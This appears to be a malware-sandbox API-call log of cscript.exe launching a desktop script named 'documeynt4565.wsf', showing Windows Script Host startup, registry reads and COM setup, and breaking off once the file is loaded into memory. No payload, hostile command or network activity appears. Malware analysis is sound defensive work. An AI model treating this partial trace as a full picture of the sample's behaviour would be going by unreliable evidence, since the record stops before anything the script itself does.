# Flog Txt Version 1
# Analyzer Version: 3.2.1
# Analyzer Build Date: Feb 18 2020 07:49:07
# Log Creation Date: 24.02.2020 15:56:34.912

Process:
	id = "1"
	image_name = "cscript.exe"
	filename = "c:\\windows\\system32\\cscript.exe"
	page_root = "0x4e177000"
	os_pid = "0x998"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x454"
	cmd_line = "\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf\" "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1
	os_tid = 0x9a8

	[0035.317] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa30 | out: lpSystemTimeAsFileTime=0x26fa30*(dwLowDateTime=0xf323780, dwHighDateTime=0x1d5eb2b)) 
	[0035.317] GetCurrentProcessId () returned 0x998
	[0035.317] GetCurrentThreadId () returned 0x9a8
	[0035.317] GetTickCount () returned 0x11444ed
	[0035.317] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa38 | out: lpPerformanceCount=0x26fa38*=15582938804) returned 1
	[0035.320] GetModuleHandleA (lpModuleName=0x0) returned 0xff6e0000
	[0035.321] GetVersionExA (in: lpVersionInformation=0x26f920*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26f920*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0035.321] GetUserDefaultLCID () returned 0x409
	[0035.323] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000
	[0035.323] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40
	[0035.323] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0035.323] FreeLibrary (hLibModule=0x77940000) returned 1
	[0035.324] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf\" "
	[0035.324] lstrlenW (lpString="\"C:\\Windows\\System32\\CScript.exe\"  \"C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf\" ") returned 81
	[0035.324] GetCurrentThreadId () returned 0x9a8
	[0035.324] CoInitialize (pvReserved=0x0) returned 0x0
	[0035.915] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f5e8 | out: phkResult=0x26f5e8*=0x88) returned 0x0
	[0035.915] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f5e0 | out: phkResult=0x26f5e0*=0x8c) returned 0x0
	[0035.915] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x26e8e8, lpData=0x26ecf0, lpcbData=0x26e8e0*=0x400 | out: lpType=0x26e8e8*=0x0, lpData=0x26ecf0*=0x1, lpcbData=0x26e8e0*=0x400) returned 0x2
	[0035.915] RegQueryValueExW (in: hKey=0x88, lpValueName="Enabled", lpReserved=0x0, lpType=0x26e8e8, lpData=0x26ecf0, lpcbData=0x26e8e0*=0x400 | out: lpType=0x26e8e8*=0x0, lpData=0x26ecf0*=0x1, lpcbData=0x26e8e0*=0x400) returned 0x2
	[0035.915] RegQueryValueExW (in: hKey=0x8c, lpValueName="Enabled", lpReserved=0x0, lpType=0x26e8e8, lpData=0x26ecf0, lpcbData=0x26e8e0*=0x400 | out: lpType=0x26e8e8*=0x0, lpData=0x26ecf0*=0x1, lpcbData=0x26e8e0*=0x400) returned 0x2
	[0035.915] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0036.405] RegCloseKey (hKey=0x8c) returned 0x0
	[0036.405] RegCloseKey (hKey=0x88) returned 0x0
	[0036.405] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f300 | out: phkResult=0x26f300*=0x88) returned 0x0
	[0036.405] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f2f8 | out: phkResult=0x26f2f8*=0x8c) returned 0x0
	[0036.405] RegQueryValueExW (in: hKey=0x8c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x26e608, lpData=0x26ea10, lpcbData=0x26e600*=0x400 | out: lpType=0x26e608*=0x0, lpData=0x26ea10*=0x0, lpcbData=0x26e600*=0x400) returned 0x2
	[0036.405] RegQueryValueExW (in: hKey=0x88, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x26e608, lpData=0x26ea10, lpcbData=0x26e600*=0x400 | out: lpType=0x26e608*=0x0, lpData=0x26ea10*=0x0, lpcbData=0x26e600*=0x400) returned 0x2
	[0036.405] RegQueryValueExW (in: hKey=0x8c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x26e608, lpData=0x26ea10, lpcbData=0x26e600*=0x400 | out: lpType=0x26e608*=0x0, lpData=0x26ea10*=0x0, lpcbData=0x26e600*=0x400) returned 0x2
	[0036.405] RegCloseKey (hKey=0x8c) returned 0x0
	[0036.405] RegCloseKey (hKey=0x88) returned 0x0
	[0036.405] GetACP () returned 0x4e4
	[0036.405] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77940000
	[0036.406] GetProcAddress (hModule=0x77940000, lpProcName="HeapSetInformation") returned 0x7795c4a0
	[0036.406] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0036.406] FreeLibrary (hLibModule=0x77940000) returned 1
	[0036.406] ??2@YAPEAX_K@Z () returned 0x3ddf90
	[0036.406] CoRegisterMessageFilter (in: lpMessageFilter=0x3ddf90, lplpMessageFilter=0x3ddfa0 | out: lplpMessageFilter=0x3ddfa0*=0x0) returned 0x0
	[0036.406] IUnknown:AddRef (This=0x3ddf90) returned 0x2
	[0036.406] GetModuleFileNameW (in: hModule=0xff6e0000, lpFilename=0x26f640, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\CScript.exe" (normalized: "c:\\windows\\system32\\cscript.exe")) returned 0x1f
	[0036.406] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", lpdwHandle=0x26ef90 | out: lpdwHandle=0x26ef90) returned 0x704
	[0036.406] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\CScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x26e880 | out: lpData=0x26e880) returned 1
	[0036.407] VerQueryValueW (in: pBlock=0x26e880, lpSubBlock="\\", lplpBuffer=0x26ef98, puLen=0x26ef94 | out: lplpBuffer=0x26ef98*=0x26e8a8, puLen=0x26ef94) returned 1
	[0036.407] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26efe8 | out: phkResult=0x26efe8*=0x88) returned 0x0
	[0036.407] RegQueryValueExW (in: hKey=0x88, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x26e338, lpData=0x26e740, lpcbData=0x26e330*=0x400 | out: lpType=0x26e338*=0x0, lpData=0x26e740*=0x0, lpcbData=0x26e330*=0x400) returned 0x2
	[0036.407] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26efa0 | out: phkResult=0x26efa0*=0x8c) returned 0x0
	[0036.407] RegQueryValueExW (in: hKey=0x8c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x26ef64, lpData=0x26efe0, lpcbData=0x26ef60*=0x4 | out: lpType=0x26ef64*=0x0, lpData=0x26efe0*=0x10, lpcbData=0x26ef60*=0x4) returned 0x2
	[0036.407] RegQueryValueExW (in: hKey=0x8c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x26e338, lpData=0x26e740, lpcbData=0x26e330*=0x400 | out: lpType=0x26e338*=0x0, lpData=0x26e740*=0x0, lpcbData=0x26e330*=0x400) returned 0x2
	[0036.407] RegQueryValueExW (in: hKey=0x88, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x26ef64, lpData=0x26efe0, lpcbData=0x26ef60*=0x4 | out: lpType=0x26ef64*=0x0, lpData=0x26efe0*=0x10, lpcbData=0x26ef60*=0x4) returned 0x2
	[0036.407] RegQueryValueExW (in: hKey=0x88, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x26e338, lpData=0x26e740, lpcbData=0x26e330*=0x400 | out: lpType=0x26e338*=0x1, lpData="1", lpcbData=0x26e330*=0x4) returned 0x0
	[0036.407] lstrlenW (lpString="1") returned 1
	[0036.407] lstrlenW (lpString="0") returned 1
	[0036.407] lstrlenW (lpString="1") returned 1
	[0036.407] lstrlenW (lpString="no") returned 2
	[0036.407] lstrlenW (lpString="1") returned 1
	[0036.407] lstrlenW (lpString="false") returned 5
	[0036.407] RegCloseKey (hKey=0x8c) returned 0x0
	[0036.407] RegCloseKey (hKey=0x88) returned 0x0
	[0036.407] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26efe8, lpdwDisposition=0x0 | out: phkResult=0x26efe8*=0x88, lpdwDisposition=0x0) returned 0x0
	[0036.407] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x26ef84, lpData=0x26efe0, lpcbData=0x26ef80*=0x4 | out: lpType=0x26ef84*=0x0, lpData=0x26efe0*=0x10, lpcbData=0x26ef80*=0x4) returned 0x2
	[0036.408] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x26e358, lpData=0x26e760, lpcbData=0x26e350*=0x400 | out: lpType=0x26e358*=0x1, lpData="1", lpcbData=0x26e350*=0x4) returned 0x0
	[0036.408] lstrlenW (lpString="1") returned 1
	[0036.408] lstrlenW (lpString="0") returned 1
	[0036.408] lstrlenW (lpString="1") returned 1
	[0036.408] lstrlenW (lpString="no") returned 2
	[0036.408] lstrlenW (lpString="1") returned 1
	[0036.408] lstrlenW (lpString="false") returned 5
	[0036.408] RegCloseKey (hKey=0x88) returned 0x0
	[0036.408] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26efe8, lpdwDisposition=0x0 | out: phkResult=0x26efe8*=0x88, lpdwDisposition=0x0) returned 0x0
	[0036.408] RegQueryValueExW (in: hKey=0x88, lpValueName="Timeout", lpReserved=0x0, lpType=0x26ef84, lpData=0x26efe0, lpcbData=0x26ef80*=0x4 | out: lpType=0x26ef84*=0x0, lpData=0x26efe0*=0x10, lpcbData=0x26ef80*=0x4) returned 0x2
	[0036.408] RegQueryValueExW (in: hKey=0x88, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x26e358, lpData=0x26e760, lpcbData=0x26e350*=0x400 | out: lpType=0x26e358*=0x0, lpData=0x26e760*=0x31, lpcbData=0x26e350*=0x400) returned 0x2
	[0036.408] RegCloseKey (hKey=0x88) returned 0x0
	[0036.408] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf") returned 43
	[0036.408] lstrlenW (lpString="wsf") returned 3
	[0036.408] lstrlenW (lpString="WSH") returned 3
	[0036.408] LoadStringW (in: hInstance=0xff6e0000, uID=0x834, lpBuffer=0x26dee0, cchBufferMax=2048 | out: lpBuffer="Microsoft (R) Windows Script Host Version %1!u!.%2!u!\nCopyright (C) Microsoft Corporation. All rights reserved.\n") returned 0x70
	[0036.408] FormatMessageW (in: dwFlags=0x500, lpSource=0x6fe48, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x26eec8, nSize=0x0, Arguments=0x26ef38 | out: lpBuffer="\x06") returned 0x6a
	[0036.409] LocalFree (hMem=0x6ecb0) returned 0x0
	[0036.409] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0036.409] lstrlenW (lpString="Microsoft (R) Windows Script Host Version 5.8\r\nCopyright (C) Microsoft Corporation. All rights reserved.\r\n") returned 106
	[0036.409] GetProcessHeap () returned 0x40000
	[0036.409] RtlAllocateHeap (HeapHandle=0x40000, Flags=0x0, Size=0xe8) returned 0x5f340
	[0036.411] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26ec98 | out: lpMode=0x26ec98) returned 1
	[0036.412] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5f340*, nNumberOfCharsToWrite=0x6c, lpNumberOfCharsWritten=0x26ec90, lpReserved=0x0 | out: lpBuffer=0x5f340*, lpNumberOfCharsWritten=0x26ec90*=0x6c) returned 1
	[0036.412] GetProcessHeap () returned 0x40000
	[0036.412] HeapFree (in: hHeap=0x40000, dwFlags=0x0, lpMem=0x5f340 | out: hHeap=0x40000) returned 1
	[0036.412] ??2@YAPEAX_K@Z () returned 0x3c5f30
	[0036.413] LoadStringW (in: hInstance=0xff6e0000, uID=0x7d1, lpBuffer=0x26da50, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0036.413] LoadTypeLib (in: szFile="C:\\Windows\\System32\\CScript.exe", pptlib=0x26ea90*=0x0 | out: pptlib=0x26ea90*=0x6f040) returned 0x0
	[0036.419] ITypeLib:GetTypeInfoOfGuid (in: This=0x6f040, GUID=0xff6f49b0*(Data1=0x91afbd1b, Data2=0x5feb, Data3=0x43f5, Data4=([0]=0xb0, [1]=0x28, [2]=0xe2, [3]=0xca, [4]=0x96, [5]=0x6, [6]=0x17, [7]=0xec)), ppTInfo=0x26ea78 | out: ppTInfo=0x26ea78*=0x70428) returned 0x0
	[0036.623] ITypeInfo:GetRefTypeOfImplType (in: This=0x70428, index=0xffffffff, pRefType=0x26ea70 | out: pRefType=0x26ea70*=0xfffffffe) returned 0x0
	[0036.623] ITypeInfo:GetRefTypeInfo (in: This=0x70428, hreftype=0xfffffffe, ppTInfo=0xff6fd638 | out: ppTInfo=0xff6fd638*=0x70480) returned 0x0
	[0036.624] IUnknown:Release (This=0x70428) returned 0x1
	[0036.624] ??2@YAPEAX_K@Z () returned 0x3c57b0
	[0036.624] ??2@YAPEAX_K@Z () returned 0x3c5850
	[0036.624] ??2@YAPEAX_K@Z () returned 0x3c58b0
	[0036.624] ITypeLib:GetTypeInfoOfGuid (in: This=0x6f040, GUID=0xff6f4f50*(Data1=0x2cc5a9d0, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x26ea78 | out: ppTInfo=0x26ea78*=0x704d8) returned 0x0
	[0036.624] ITypeInfo:GetRefTypeOfImplType (in: This=0x704d8, index=0xffffffff, pRefType=0x26ea70 | out: pRefType=0x26ea70*=0xfffffffe) returned 0x0
	[0036.624] ITypeInfo:GetRefTypeInfo (in: This=0x704d8, hreftype=0xfffffffe, ppTInfo=0xff6fd6b8 | out: ppTInfo=0xff6fd6b8*=0x70530) returned 0x0
	[0036.624] IUnknown:Release (This=0x704d8) returned 0x1
	[0036.624] ITypeLib:GetTypeInfoOfGuid (in: This=0x6f040, GUID=0xff6f4f60*(Data1=0xbf64faf0, Data2=0x5906, Data3=0x426c, Data4=([0]=0xb4, [1]=0xbc, [2]=0x7b, [3]=0x75, [4]=0x3c, [5]=0xbe, [6]=0x81, [7]=0x9f)), ppTInfo=0x26ea78 | out: ppTInfo=0x26ea78*=0x70588) returned 0x0
	[0036.624] ITypeInfo:GetRefTypeOfImplType (in: This=0x70588, index=0xffffffff, pRefType=0x26ea70 | out: pRefType=0x26ea70*=0xfffffffe) returned 0x0
	[0036.624] ITypeInfo:GetRefTypeInfo (in: This=0x70588, hreftype=0xfffffffe, ppTInfo=0xff6fd6f8 | out: ppTInfo=0xff6fd6f8*=0x705e0) returned 0x0
	[0036.625] IUnknown:Release (This=0x70588) returned 0x1
	[0036.625] ITypeLib:GetTypeInfoOfGuid (in: This=0x6f040, GUID=0xff6f4e20*(Data1=0x2cc5a9d1, Data2=0xb1e5, Data3=0x11d3, Data4=([0]=0xa2, [1]=0x86, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppTInfo=0x26ea78 | out: ppTInfo=0x26ea78*=0x70638) returned 0x0
	[0036.625] ITypeInfo:GetRefTypeOfImplType (in: This=0x70638, index=0xffffffff, pRefType=0x26ea70 | out: pRefType=0x26ea70*=0xfffffffe) returned 0x0
	[0036.625] ITypeInfo:GetRefTypeInfo (in: This=0x70638, hreftype=0xfffffffe, ppTInfo=0xff6fd678 | out: ppTInfo=0xff6fd678*=0x70690) returned 0x0
	[0036.625] IUnknown:Release (This=0x70638) returned 0x1
	[0036.625] IUnknown:Release (This=0x6f040) returned 0x4
	[0036.625] ??2@YAPEAX_K@Z () returned 0x3c5910
	[0036.625] GetCurrentThreadId () returned 0x9a8
	[0036.625] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd8
	[0036.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff6e23e8, lpParameter=0x3c5910, dwCreationFlags=0x0, lpThreadId=0x3c5938 | out: lpThreadId=0x3c5938*=0xb40) returned 0xe0
	[0036.626] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x26ecd0*=0xd8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0036.777] CloseHandle (hObject=0xd8) returned 1
	[0036.777] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf", nBufferLength=0x104, lpBuffer=0x26ed60, lpFilePart=0x26ed50 | out: lpBuffer="C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf", lpFilePart=0x26ed50*="documeynt4565.wsf") returned 0x2b
	[0036.778] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".wsf", ulOptions=0x0, samDesired=0x20019, phkResult=0x26e270 | out: phkResult=0x26e270*=0xf2) returned 0x0
	[0036.778] RegQueryValueExW (in: hKey=0xf2, lpValueName=0x0, lpReserved=0x0, lpType=0x26e220, lpData=0x26e280, lpcbData=0x26e224*=0x800 | out: lpType=0x26e220*=0x1, lpData="WSFFile", lpcbData=0x26e224*=0x10) returned 0x0
	[0036.778] RegCloseKey (hKey=0xf2) returned 0x0
	[0036.778] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="WSFFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26e270 | out: phkResult=0x26e270*=0x0) returned 0x2
	[0036.779] lstrlenW (lpString=".wsf") returned 4
	[0036.779] lstrlenW (lpString=".wsf") returned 4
	[0036.779] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x7feff760000
	[0039.887] GetProcAddress (hModule=0x7feff760000, lpProcName="CreateURLMonikerEx") returned 0x7feff77f3e0
	[0039.887] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="C:\\Users\\5P5NRG~1\\Desktop\\documeynt4565.wsf", ppmk=0x26ed48*=0x0, dwFlags=0x1 | out: ppmk=0x26ed48*=0x82910) returned 0x0
	[0039.893] CoCreateInstance (in: rclsid=0xff6f5218*(Data1=0x6290bd6, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff6f5238*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0x26f898 | out: ppv=0x26f898*=0x0) returned 0x80040154
	[0040.247] CoCreateInstance (in: rclsid=0xff6f5208*(Data1=0x6290bd0, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff6f5238*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0x26f898 | out: ppv=0x26f898*=0x3c70b8) returned 0x0
	[0040.480] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26ce80 | out: lpSystemTimeAsFileTime=0x26ce80*(dwLowDateTime=0xfbea8a0, dwHighDateTime=0x1d5eb2b)) 
	[0040.480] GetCurrentProcessId () returned 0x998
	[0040.480] GetCurrentThreadId () returned 0x9a8
	[0040.480] GetTickCount () returned 0x1144885
	[0040.480] QueryPerformanceCounter (in: lpPerformanceCount=0x26ce88 | out: lpPerformanceCount=0x26ce88*=16099266019) returned 1
	[0040.480] malloc (_Size=0x100) returned 0x3c6cd0
	[0040.481] __dllonexit () returned 0x7fef92c14c0
	[0040.481] __dllonexit () returned 0x7fef92c14e8
	[0040.481] GetVersionExA (in: lpVersionInformation=0x26cc60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xf92c2dc9, dwBuildNumber=0x7fe, dwPlatformId=0xf92c14e8, szCSDVersion="þ\x07") | out: lpVersionInformation=0x26cc60*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0040.481] GetProcessWindowStation () returned 0x2c
	[0040.481] GetUserObjectInformationA (in: hObj=0x2c, nIndex=1, pvInfo=0x26cc48, nLength=0xc, lpnLengthNeeded=0x26cc40 | out: pvInfo=0x26cc48, lpnLengthNeeded=0x26cc40) returned 1
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c5a60
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c5ab0
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6de0
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6e20
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6e60
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6ea0
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6ee0
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6f20
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6f60
	[0040.481] ??2@YAPEAX_K@Z () returned 0x3c6fa0
	[0040.482] ??2@YAPEAX_K@Z () returned 0x3c6fe0
	[0040.482] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0040.482] ??2@YAPEAX_K@Z () returned 0x3c7030
	[0040.482] ??2@YAPEAX_K@Z () returned 0x3c7070
	[0040.482] DllGetClassObject (in: rclsid=0x8c950*(Data1=0x6290bd0, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7feff426cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d950 | out: ppv=0x26d950*=0x3c5ab0) returned 0x0
	[0040.482] ??2@YAPEAX_K@Z () returned 0x3c5ab0
	[0040.482] IClassFactory:CreateInstance (in: This=0x3c5ab0, pUnkOuter=0x0, riid=0x26e730*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d970 | out: ppvObject=0x26d970*=0x3c70b8) returned 0x0
	[0040.482] ??2@YAPEAX_K@Z () returned 0x3c70b0
	[0040.482] ??2@YAPEAX_K@Z () returned 0x3c7110
	[0040.483] IUnknown:AddRef (This=0x3c70b8) returned 0x2
	[0040.483] IUnknown:Release (This=0x3c70b8) returned 0x1
	[0040.483] IUnknown:Release (This=0x3c5ab0) returned 0x0
	[0040.483] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0040.483] IUnknown:QueryInterface (in: This=0x3c70b8, riid=0xff6f5238*(Data1=0x6290bea, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26ebb8 | out: ppvObject=0x26ebb8*=0x3c70b8) returned 0x0
	[0040.483] IUnknown:Release (This=0x3c70b8) returned 0x1
	[0040.483] GetUserDefaultLCID () returned 0x409
	[0040.483] ??2@YAPEAX_K@Z () returned 0x3c5ab0
	[0040.483] ??2@YAPEAX_K@Z () returned 0x3c7140
	[0040.484] CoGetClassObject (in: rclsid=0xff6f5228*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), dwClsContext=0x1, pvReserved=0x0, riid=0xff6f5268*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0x26ec90 | out: ppv=0x26ec90*=0x3c7180) returned 0x0
	[0040.485] DllGetClassObject (in: rclsid=0x8c9a0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x26e720*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppv=0x26da20 | out: ppv=0x26da20*=0x3c7180) returned 0x0
	[0040.485] ??2@YAPEAX_K@Z () returned 0x3c7180
	[0040.485] IUnknown:AddRef (This=0x3c7180) returned 0x2
	[0040.485] IUnknown:Release (This=0x3c7180) returned 0x1
	[0040.485] IUnknown:QueryInterface (in: This=0x3c7180, riid=0xff6f5268*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26e9a0 | out: ppvObject=0x26e9a0*=0x3c7180) returned 0x0
	[0040.485] IUnknown:Release (This=0x3c7180) returned 0x1
	[0040.486] ??2@YAPEAX_K@Z () returned 0x3c71a0
	[0040.486] ??2@YAPEAX_K@Z () returned 0x3c7250
	[0040.486] ??2@YAPEAX_K@Z () returned 0x3c7270
	[0040.486] ??2@YAPEAX_K@Z () returned 0x3c72b0
	[0040.486] CreateBindCtx (in: reserved=0x0, ppbc=0x26ed28 | out: ppbc=0x26ed28*=0x85290) returned 0x0
	[0040.486] IBindCtx:RemoteSetBindOptions (This=0x85290, pbindopts=0x26eca0) returned 0x0
	[0040.486] IMoniker:RemoteBindToStorage (in: This=0x82910, pbc=0x85290, pmkToLeft=0x0, riid=0x7fef92e7db0*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObj=0x26eb28 | out: ppvObj=0x26eb28*=0x85530) returned 0x0
	[0040.508] malloc (_Size=0x57b2) returned 0x3c72e0
	[0040.508] ??2@YAPEAX_K@Z () returned 0x3ccaa0
